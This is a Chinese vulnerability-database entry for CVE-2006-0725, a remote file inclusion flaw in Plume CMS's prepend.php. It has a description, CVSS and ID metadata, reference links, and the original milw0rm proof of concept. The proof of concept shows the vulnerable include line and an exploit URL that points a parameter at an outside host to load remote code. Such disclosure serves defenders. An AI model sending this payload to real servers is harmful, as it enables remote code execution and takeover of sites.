Plume CMS prepend.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110330 漏洞类型 代码注入
发布时间 2006-05-26 更新时间 2006-07-17
CVE编号 CVE-2006-0725 CNNVD-ID CNNVD-200602-251
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/1832
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-251
|漏洞详情
PlumeCMS是一款PHP实现的基于Web的内容管理系统,以MySQL作为后台数据库。PlumeCMS实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。PlumeCMS的prepend.php脚本没有充分对用户提交的请求进行过滤,攻击者可以使脚本包含远程服务器上的文件,通过注入脚本代码在服务器上以Web进程权限执行任意命令。
|漏洞EXP
Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

# milw0rm.com [2006-05-26]
|参考资料

来源:XF
名称:plumecms-prepend-file-include(24697)
链接:http://xforce.iss.net/xforce/xfdb/24697
来源:BID
名称:16662
链接:http://www.securityfocus.com/bid/16662
来源:OSVDB
名称:23204
链接:http://www.osvdb.org/23204
来源:VUPEN
名称:ADV-2006-0599
链接:http://www.frsirt.com/english/advisories/2006/0599
来源:SECTRACK
名称:1015624
链接:http://securitytracker.com/id?1015624
来源:SECUNIA
名称:18883
链接:http://secunia.com/advisories/18883
来源:plume-cms.net
链接:http://plume-cms.net/news/77-Security-Notice-Please-Update-Your-Prependphp-File
来源:XF
名称:plumecms-frontinc-prepend-file-include(27699)
链接:http://xforce.iss.net/xforce/xfdb/27699